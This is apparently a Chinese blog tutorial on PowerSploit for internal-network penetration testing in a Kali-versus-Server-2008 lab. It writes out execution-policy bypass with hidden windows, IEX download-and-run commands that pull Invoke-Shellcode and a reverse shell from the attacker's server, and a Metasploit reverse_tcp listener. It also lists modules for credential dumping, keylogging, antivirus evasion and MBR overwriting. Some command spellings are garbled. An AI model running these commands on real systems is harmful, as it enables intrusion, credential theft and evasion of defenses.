powershell滲透工具——Powershell內網滲透利器之PowerSploit，場景真tm多啊

Powershell內網滲透利器之PowerSploit

powershell是一種命令行 外殼程序和腳本環境，使命令行用戶和 腳本編寫者可以利用 .NET Framework的強大功能，PowerShell腳本的文本文件，其文件名需要加上擴展名“.PS1”。PowerShell需要.NET環境的支持，同時支持.NET對象，其可讀性、易用性居所有Shell之首。

PowerShell具有以下特點。

1、在Windows 7以上的操作系統中是默認安裝的。

2、PowerShell腳本可以運行在內存中，不需要寫入磁盤。

3、幾乎不會觸發殺毒軟件。

4、可以遠程執行。

5、目前很多工具都是基於PowerShell開發的。

6、使得Windows的腳本攻擊變得更加容易。

7、cmd.exe通常會被阻止運行，但是PowerShell不會。

8、可以用來管理活動目錄。

 

 

 

下面以文件操作為例講解PowerShell命令的基本用法。

1、新建目錄：New-ltem whitecellclub-ltemType Directory。

2、新建文件：New-ltem light.txt-ltemType File。

3、刪除目錄：Remove-ltem whitecellclub。

4、顯示文本內容：Get-Content test.txt。

5、設置文本內容：Set-Content test.txt-Va l u e''hello,word! ''。

6、追加內容：Add-Content light.txt-Value ''i love you ''。

7、清除內容：Clear-Content test.txt。

 

請參考powershell在線教程： https://www.pstips.net/powershell-online-tutorials

 

攻擊機：kali

靶機：server2008 R2

 

 

首先在kali里把web服務給開開。

 

下載最新版的PowerSploit腳本文件到本地；git clone https://github.com/mattifestation/PowerSploit.git

PowerSploit是GitHub上面的一個安全項目，上面有很多powershell攻擊腳本，它們主要被用來滲透中的信息偵察、權限提升、權限維持。

 

再把PowerSploit文件放到web目錄中

 

 

用msfvenom生成一個反彈shell，方便invoke-shellcode注入，再把shell放到web里

 

 

（1）繞過本地權限執行

如果是管理員身份可以運行powerrshell之后,設置腳本的運行策略　

set-executionpolicy unrestricted

 

PowerShell腳本在默認情況下無法直接執行，這時可以使用下面方法繞過安全策略，運行PowerShell腳本繞過本地權限 執行。（ 注：先上傳PowerUp.ps1至目標服務器）

powershell.exe -exec bypass -Command "& {Import-Module C:\PowerUp.ps1; Invoke-AllChecks}"

 

運行完隱藏命令后窗口會關閉，繞過本地權限隱藏執行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Nonl

 

（2）從網站服務器上下載PS1腳本，繞過本地權限隱藏執行

在靶機上執行命令（為了更直觀所以通過IEX下載調用invoke-shellcode以及生成的反彈馬。）

IEX(New-Object Net.WebClient).DownloadString(“ http://192.168.1.1/CodeExecution/Invoke-Shellcode.ps1”)

IEX(New-Object Net.WebClient).DownloadString(“ http://192.168.1.1/code”)

執行

Invoke-Shellcode -shellcode $buf -Foece

用msf設置監聽

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LhOST 192.168.47.131

執行監聽，查看效果

若關閉powershell，那么連接也會終斷， 因為承載木馬的powershell被關閉了。

 

下面對上述命令中的參數進行說明。

1-ExecutionPolicy Bypass（-Exec Bypass）：繞過執行安全策略，這個參數非常重要。在默認情況下，PowerShell的安全策略規定了PowerShell不允許運行命令和文件。通過設置這個參數，可以繞過任意安全保護規則。在滲透測試中，通常每次運行PowerShell腳本時都要使用這個參數。

2-WindowStyle Hidden(-W Hidden)：隱藏窗口。

3-Nonlnteractive（-NonI）：非交互模式。PowerShell不為用戶提供交互的提示。-NoProfile（-NoP）：PowerShell控制台不加載當前用戶的配置文件。

4-noexit：執行后不退出Shell。這在使用鍵盤記錄等腳本時非常重要。

5-NoLogo：啟動不顯示版權標志的PowerShell。

 

Windows操作系統中，存在兩個版本的PowerShell，一個x64版的，還有一個x86版的。 這兩個版本的執行策略不會相互影響，可以把它們看成兩個獨立的程序。x64版PowerShell的配置文件位於%windir%\syswow64\WindowsPowerShell\v1.0\下。

 

 

 

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:

 

CodeExecution

Execute code on a target machine.

 

Invoke-DllInjection

Injects a Dll into the process ID of your choosing.

 

Invoke-ReflectivePEInjection

Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.

 

Invoke-Shellcode

Injects shellcode into the process ID of your choosing or within PowerShell locally.

 

Invoke-WmiCommand

Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.

 

ScriptModification

Modify and/or prepare scripts for execution on a compromised machine.

 

Out-EncodedCommand

Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.

 

Out-CompressedDll

Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.

 

Out-EncryptedScript

Encrypts text files/scripts.

 

Remove-Comment

Strips comments and extra whitespace from a script.

 

Persistence

Add persistence capabilities to a PowerShell script

 

New-UserPersistenceOption

Configure user-level persistence options for the Add-Persistence function.

 

New-ElevatedPersistenceOption

Configure elevated persistence options for the Add-Persistence function.

 

Add-Persistence

Add persistence capabilities to a script.

 

Install-SSP

Installs a security support provider (SSP) dll.

 

Get-SecurityPackages

Enumerates all loaded security packages (SSPs).

 

AntivirusBypass

AV doesn't stand a chance against PowerShell!

 

Find-AVSignature

Locates single Byte AV signatures utilizing the same method as DSplit from "class101".

 

Exfiltration

All your data belong to me!

 

Invoke-TokenManipulation

Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.

 

Invoke-CredentialInjection

Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).

 

Invoke-NinjaCopy

Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.

 

Invoke-Mimikatz

Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.

 

Get-Keystrokes

Logs keys pressed, time and the active window.

 

Get-GPPPassword

Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

 

Get-GPPAutologon

Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.

 

Get-TimedScreenshot

A function that takes screenshots at a regular interval and saves them to a folder.

 

New-VolumeShadowCopy

Creates a new volume shadow copy.

 

Get-VolumeShadowCopy

Lists the device paths of all local volume shadow copies.

 

Mount-VolumeShadowCopy

Mounts a volume shadow copy.

 

Remove-VolumeShadowCopy

Deletes a volume shadow copy.

 

Get-VaultCredential

Displays Windows vault credential objects including cleartext web credentials.

 

Out-Minidump

Generates a full-memory minidump of a process.

 

Get-MicrophoneAudio

Records audio from system microphone and saves to disk

 

Mayhem

Cause general mayhem with PowerShell.

 

Set-MasterBootRecord

Proof of concept code that overwrites the master boot record with the message of your choice.

 

Set-CriticalProcess

Causes your machine to blue screen upon exiting PowerShell.

 

Privesc

Tools to help with escalating privileges on a target.

 

PowerUp

Clearing house of common privilege escalation checks, along with some weaponization vectors.

 

Recon

Tools to aid in the reconnaissance phase of a penetration test.

 

Invoke-Portscan

Does a simple port scan using regular sockets, based (pretty) loosely on nmap.

 

Get-HttpStatus

Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.

 

Invoke-ReverseDnsLookup

Scans an IP address range for DNS PTR records.

 

PowerView

PowerView is series of functions that performs network and Windows domain enumeration and exploitation.

 

Recon\Dictionaries

A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.

• admin.txt - http://cirt.net/nikto2/
• generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/
• sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/